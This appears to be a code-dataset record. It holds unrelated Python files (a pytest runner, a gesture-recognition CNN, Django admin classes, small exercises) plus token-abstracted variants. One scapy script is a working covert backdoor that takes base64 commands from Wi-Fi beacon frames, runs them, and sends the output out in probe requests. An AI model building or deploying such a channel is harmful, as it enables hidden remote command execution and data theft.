"import pytest\nimport os\nimport sys\nfrom ks_login import load_log\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\nlog = load_log.Log()\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\nif __name__ == '__main__':\n try:\n work_path = sys.argv[1]\n except Exception as e:\n log.error(e.args)\n work_path = None\n print(work_path)\n run = TbpRunner()\n run.run(path=work_path)\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n\n def run(self, path=None, run_args=None, case_mark=None):\n if path:\n work_runner = []\n path_list = path.split(',')\n work_runner.append('-s')\n if case_mark:\n work_runner.append('-m=%s' % case_mark)\n for i in path_list:\n work_runner.append(i)\n work_runner.append('--alluredir')\n work_runner.append('report')\n print(work_runner)\n pytest.main(work_runner)\n else:\n pytest.main(['-s', 'pytest_test/options', '--alluredir', 'report'])\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\nclass TbpRunner(object):\n <function token>\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<class token>\n<code token>\n"
] | false |
99,841 | a09cc97f4d2c090b3a347a3edbd2d6bb25f3ef9a | ### Gesture Detection using CNN
import os
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.preprocessing import image
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout
num_classes = 3 # number of gestures
target_size = (96,96)
# Dataset
#train_dir = 'data/gesture'
train_dir = 'data/game'
# Data Generator
rescale = 1./255
train_datagen = ImageDataGenerator(
rescale=rescale,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=target_size,
class_mode='categorical',
batch_size=8,
color_mode="rgb",
shuffle=True)
# Build Model
model = keras.models.Sequential()
# block 1
model.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(96,96,3)))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 2
model.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 3
model.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# block 3
model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
# fully-connected layers
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes , activation='softmax'))
# Compile Model
model.compile(optimizer='Adam',loss='categorical_crossentropy',metrics=['accuracy'])
model.summary()
# Train Model
num_epochs=100
model.fit_generator(generator=train_generator,
steps_per_epoch=train_generator.n // train_generator.batch_size,
epochs=num_epochs)
# Save Model
model.save('model/gesture_cnn.h5')
| [
"### Gesture Detection using CNN\r\nimport os\r\nimport tensorflow as tf\r\nimport tensorflow.keras as keras \r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\r\n\r\nnum_classes = 3 # number of gestures\r\ntarget_size = (96,96)\r\n\r\n# Dataset \r\n#train_dir = 'data/gesture'\r\ntrain_dir = 'data/game'\r\n\r\n# Data Generator\r\nrescale = 1./255\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=rescale,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(\r\n train_dir,\r\n target_size=target_size,\r\n class_mode='categorical',\r\n batch_size=8,\r\n color_mode=\"rgb\",\t\r\n shuffle=True)\r\n\t\r\n# Build Model\r\nmodel = keras.models.Sequential()\r\n# block 1\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu', input_shape=(96,96,3)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 2\r\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 3\r\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# block 3\r\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n# fully-connected layers\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(num_classes , activation='softmax'))\r\n\r\n# Compile Model\r\nmodel.compile(optimizer='Adam',loss='categorical_crossentropy',metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n# Train Model \r\nnum_epochs=100\r\n\r\nmodel.fit_generator(generator=train_generator, \r\n\tsteps_per_epoch=train_generator.n // train_generator.batch_size, \r\n\tepochs=num_epochs)\r\n\t\t\t\r\n# Save Model\r\nmodel.save('model/gesture_cnn.h5')\r\n",
"import os\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\nnum_classes = 3\ntarget_size = 96, 96\ntrain_dir = 'data/game'\nrescale = 1.0 / 255\ntrain_datagen = ImageDataGenerator(rescale=rescale, shear_range=0.2,\n zoom_range=0.2, horizontal_flip=True)\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=\n target_size, class_mode='categorical', batch_size=8, color_mode='rgb',\n shuffle=True)\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\nnum_epochs = 100\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\nnum_classes = 3\ntarget_size = 96, 96\ntrain_dir = 'data/game'\nrescale = 1.0 / 255\ntrain_datagen = ImageDataGenerator(rescale=rescale, shear_range=0.2,\n zoom_range=0.2, horizontal_flip=True)\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=\n target_size, class_mode='categorical', batch_size=8, color_mode='rgb',\n shuffle=True)\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\nnum_epochs = 100\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\n<assignment token>\nmodel.add(Conv2D(32, kernel_size=(3, 3), padding='same', activation='relu',\n input_shape=(96, 96, 3)))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(96, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\nmodel.compile(optimizer='Adam', loss='categorical_crossentropy', metrics=[\n 'accuracy'])\nmodel.summary()\n<assignment token>\nmodel.fit_generator(generator=train_generator, steps_per_epoch=\n train_generator.n // train_generator.batch_size, epochs=num_epochs)\nmodel.save('model/gesture_cnn.h5')\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,842 | 8272875d21b2d67ba55b112d4573a1007a491099 | #!/usr/bin/python
# python receiver.py mon0
import subprocess
import logging
import time
import base64
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
interface=sys.argv[1] #mon0
conf.iface=interface
def executeHere(cmd):
cmd = base64.b64decode(cmd)
print "Command: "+cmd
cmd = cmd.split(" ")
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
print "Command Output:"
out = out.rstrip("\n")
print out
print "Output Length: "+str(len(out))
print "Command Error:"
print err
print "Error Length: "+str(len(err))
print "Output Base64 Length: "+str(len(base64.b64encode(out)))
probereq = RadioTap()/Dot11(type=0,subtype=4,addr1="ff:ff:ff:ff:ff:ff", addr2="11:22:33:44:55:66",addr3="ff:ff:ff:ff:ff:ff")/Dot11Elt(ID=0,info=base64.b64encode(out))/Dot11Elt(ID=1,info="\x82\x84\x8b\x96")
print "Sleeping for 5 seconds..."
time.sleep(5)
print "Sending output in Probe Request..."
try:
sendp(probereq, iface=interface, verbose=0)
except Exception,e:
print "Exception: "+str(e)
print "Sending caught exception..."
exprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1="ff:ff:ff:ff:ff:ff", addr2="11:22:33:44:55:66",addr3="ff:ff:ff:ff:ff:ff")/Dot11Elt(ID=0,info=base64.b64encode(str(e)))/Dot11Elt(ID=1,info="\x82\x84\x8b\x96")
sendp(exprobereq, iface=interface, verbose=0)
def packets(pkt):
try:
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank
if pkt.addr2 == "11:22:33:44:55:66":
print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info))
#print ':'.join(x.encode('hex') for x in pkt[Dot11Elt:2].info)
executeHere(str(pkt[Dot11Elt:2].info))
return True
except Exception,e:
print "Something bad happened..."+str(e)
while 1:
try:
print "\nSniffing for packets..."
sniff(iface=interface, stop_filter=packets)
except Exception,e:
print "Exception: "+str(e)
| [
"#!/usr/bin/python\n\n# python receiver.py mon0\n\nimport subprocess\nimport logging\nimport time\nimport base64\nimport sys\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nfrom scapy.all import * \n\ninterface=sys.argv[1] #mon0\n\nconf.iface=interface\n\ndef executeHere(cmd):\n\tcmd = base64.b64decode(cmd)\n\tprint \"Command: \"+cmd\n\tcmd = cmd.split(\" \")\n\tp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n\tprint \"Command Output:\"\n\tout = out.rstrip(\"\\n\")\n\tprint out\n\tprint \"Output Length: \"+str(len(out))\n\tprint \"Command Error:\"\n\tprint err\n\tprint \"Error Length: \"+str(len(err))\n\tprint \"Output Base64 Length: \"+str(len(base64.b64encode(out)))\n\tprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1=\"ff:ff:ff:ff:ff:ff\", addr2=\"11:22:33:44:55:66\",addr3=\"ff:ff:ff:ff:ff:ff\")/Dot11Elt(ID=0,info=base64.b64encode(out))/Dot11Elt(ID=1,info=\"\\x82\\x84\\x8b\\x96\")\n\n\tprint \"Sleeping for 5 seconds...\"\n\ttime.sleep(5)\n\tprint \"Sending output in Probe Request...\"\n\ttry:\n\t\tsendp(probereq, iface=interface, verbose=0)\n\texcept Exception,e:\n\t\tprint \"Exception: \"+str(e)\n\t\tprint \"Sending caught exception...\"\n\t\texprobereq = RadioTap()/Dot11(type=0,subtype=4,addr1=\"ff:ff:ff:ff:ff:ff\", addr2=\"11:22:33:44:55:66\",addr3=\"ff:ff:ff:ff:ff:ff\")/Dot11Elt(ID=0,info=base64.b64encode(str(e)))/Dot11Elt(ID=1,info=\"\\x82\\x84\\x8b\\x96\")\n\t\tsendp(exprobereq, iface=interface, verbose=0)\n\ndef packets(pkt):\n\ttry:\n\t\tif pkt.haslayer(Dot11):\n\t\t\tif pkt.type == 0 and pkt.subtype == 8 and pkt.info == \"\" : # if management frame and beacon and SSID is blank\n\t\t\t\tif pkt.addr2 == \"11:22:33:44:55:66\":\n\t\t\t\t\tprint \"AP MAC: %s | SSID: %s | Rates: %s\" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info))\n\t\t\t\t\t#print ':'.join(x.encode('hex') for x in pkt[Dot11Elt:2].info)\n\t\t\t\t\texecuteHere(str(pkt[Dot11Elt:2].info))\n\t\t\t\t\treturn True\n\texcept Exception,e:\n\t\tprint \"Something bad happened...\"+str(e)\n\n\nwhile 1:\n\ttry:\n\t\tprint \"\\nSniffing for packets...\"\n\t\tsniff(iface=interface, stop_filter=packets)\n\texcept Exception,e:\n\t\tprint \"Exception: \"+str(e)\n"
] | true |
99,843 | 8269e953897fa484c491d366057a5be9c81ddc70 | dict = {}
dict['one'] = '1-课程'
dict[2] = '2-课程'
tindict = {'name':'赵宗召','code':'1','site':'www.baidu.com'}
# print(dict['one'])
# print(dict[2])
# print(dict)
# print(tindict.keys())
# print(tindict.values())
print(tindict.pop('name'))
print(tindict)
#
list = ('1',2,3)
dict2 =dict.fromkeys(list,10)
print(dict2)
#
# print(dict2.get('name'))
#
# print(2 in dict2)
#
# print(dict2.items())
#
# print(dict2.update(dict))
# print(dict2)
#
print(dict2.pop(2))
#
# print(dict2.popitem()) | [
"dict = {}\ndict['one'] = '1-课程'\ndict[2] = '2-课程'\ntindict = {'name':'赵宗召','code':'1','site':'www.baidu.com'}\n# print(dict['one'])\n# print(dict[2])\n# print(dict)\n# print(tindict.keys())\n# print(tindict.values())\nprint(tindict.pop('name'))\nprint(tindict)\n#\nlist = ('1',2,3)\ndict2 =dict.fromkeys(list,10)\nprint(dict2)\n#\n# print(dict2.get('name'))\n#\n# print(2 in dict2)\n#\n# print(dict2.items())\n#\n# print(dict2.update(dict))\n# print(dict2)\n#\nprint(dict2.pop(2))\n#\n# print(dict2.popitem())",
"dict = {}\ndict['one'] = '1-课程'\ndict[2] = '2-课程'\ntindict = {'name': '赵宗召', 'code': '1', 'site': 'www.baidu.com'}\nprint(tindict.pop('name'))\nprint(tindict)\nlist = '1', 2, 3\ndict2 = dict.fromkeys(list, 10)\nprint(dict2)\nprint(dict2.pop(2))\n",
"<assignment token>\nprint(tindict.pop('name'))\nprint(tindict)\n<assignment token>\nprint(dict2)\nprint(dict2.pop(2))\n",
"<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,844 | 6498e992f72fea4adbfcc69b6ff70baf15dee3af | import os
clear = lambda: os.system("clear")
clear()
nameBid = {}
stop = False
while not stop:
name = input("What name would you like to place on your bid?: ")
bid = float(input("What is your bid?: $"))
nameBid[name] = bid
peopleNeedingToBid = input(
"Thank you for your bid, Are there any others needing to bid? Yes or No "
).lower()
if peopleNeedingToBid == "no":
stop = True
clear()
personWithHighestBid = ""
highestBid = 0
for name in nameBid:
bid = nameBid[name]
if bid > highestBid:
personWithHighestBid = name
highestBid = bid
print(f"{personWithHighestBid} is the winner with a bid of ${round(highestBid,2)}")
| [
"import os\n\nclear = lambda: os.system(\"clear\")\nclear()\n\nnameBid = {}\nstop = False\n\nwhile not stop:\n name = input(\"What name would you like to place on your bid?: \")\n bid = float(input(\"What is your bid?: $\"))\n\n nameBid[name] = bid\n\n peopleNeedingToBid = input(\n \"Thank you for your bid, Are there any others needing to bid? Yes or No \"\n ).lower()\n\n if peopleNeedingToBid == \"no\":\n stop = True\n\n clear()\n\npersonWithHighestBid = \"\"\nhighestBid = 0\n\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\n\nprint(f\"{personWithHighestBid} is the winner with a bid of ${round(highestBid,2)}\")\n",
"import os\nclear = lambda : os.system('clear')\nclear()\nnameBid = {}\nstop = False\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\npersonWithHighestBid = ''\nhighestBid = 0\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\nclear = lambda : os.system('clear')\nclear()\nnameBid = {}\nstop = False\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\npersonWithHighestBid = ''\nhighestBid = 0\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\n<assignment token>\nclear()\n<assignment token>\nwhile not stop:\n name = input('What name would you like to place on your bid?: ')\n bid = float(input('What is your bid?: $'))\n nameBid[name] = bid\n peopleNeedingToBid = input(\n 'Thank you for your bid, Are there any others needing to bid? Yes or No '\n ).lower()\n if peopleNeedingToBid == 'no':\n stop = True\n clear()\n<assignment token>\nfor name in nameBid:\n bid = nameBid[name]\n if bid > highestBid:\n personWithHighestBid = name\n highestBid = bid\nprint(\n f'{personWithHighestBid} is the winner with a bid of ${round(highestBid, 2)}'\n )\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,845 | ed8407bc10bc0a5d1b35eef33b87be7551e7f84f | from django.contrib import admin
from . import models
class ExternalLinkInline(admin.TabularInline):
model = models.ExternalLink
extra = 1
class TalkInline(admin.StackedInline):
model = models.Talk
filter_horizontal = ('speakers',)
extra = 1
class MeetupAdmin(admin.ModelAdmin):
inlines = (TalkInline, ExternalLinkInline)
readonly_fields = ('date_modified',)
class TalkAdmin(admin.ModelAdmin):
list_display = ('title', 'meetup')
readonly_fields = ['message', 'proposal_date']
def message(self, obj):
try:
message = obj.talkproposal_set.all()[0].message
except IndexError:
message = ""
return message
def proposal_date(self, obj):
try:
date = obj.talkproposal_set.all()[0].date_submitted
except IndexError:
date = ""
return date
admin.site.register(models.MeetupType)
admin.site.register(models.Meetup, MeetupAdmin)
admin.site.register(models.Speaker)
admin.site.register(models.Talk, TalkAdmin)
admin.site.register(models.Sponsor)
admin.site.register(models.Venue) | [
"from django.contrib import admin\n\nfrom . import models\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = ('speakers',)\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = (TalkInline, ExternalLinkInline)\n readonly_fields = ('date_modified',)\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = ('title', 'meetup')\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = \"\"\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = \"\"\n return date \n\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)",
"from django.contrib import admin\nfrom . import models\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\nadmin.site.register(models.MeetupType)\nadmin.site.register(models.Meetup, MeetupAdmin)\nadmin.site.register(models.Speaker)\nadmin.site.register(models.Talk, TalkAdmin)\nadmin.site.register(models.Sponsor)\nadmin.site.register(models.Venue)\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n model = models.ExternalLink\n extra = 1\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n\n\nclass ExternalLinkInline(admin.TabularInline):\n <assignment token>\n <assignment token>\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass TalkInline(admin.StackedInline):\n model = models.Talk\n filter_horizontal = 'speakers',\n extra = 1\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n\n\nclass TalkInline(admin.StackedInline):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n inlines = TalkInline, ExternalLinkInline\n readonly_fields = 'date_modified',\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n\n\nclass MeetupAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n list_display = 'title', 'meetup'\n readonly_fields = ['message', 'proposal_date']\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n\n def message(self, obj):\n try:\n message = obj.talkproposal_set.all()[0].message\n except IndexError:\n message = ''\n return message\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <function token>\n\n def proposal_date(self, obj):\n try:\n date = obj.talkproposal_set.all()[0].date_submitted\n except IndexError:\n date = ''\n return date\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n\n\nclass TalkAdmin(admin.ModelAdmin):\n <assignment token>\n <assignment token>\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<class token>\n<class token>\n<class token>\n<code token>\n"
] | false |
99,846 | 97ea75fb570d5ad45b040d2ddb8b36477aeaaa10 | """-"""
SETTINGS = {
'logging': {
'level': 'WARN'
}
}
| [
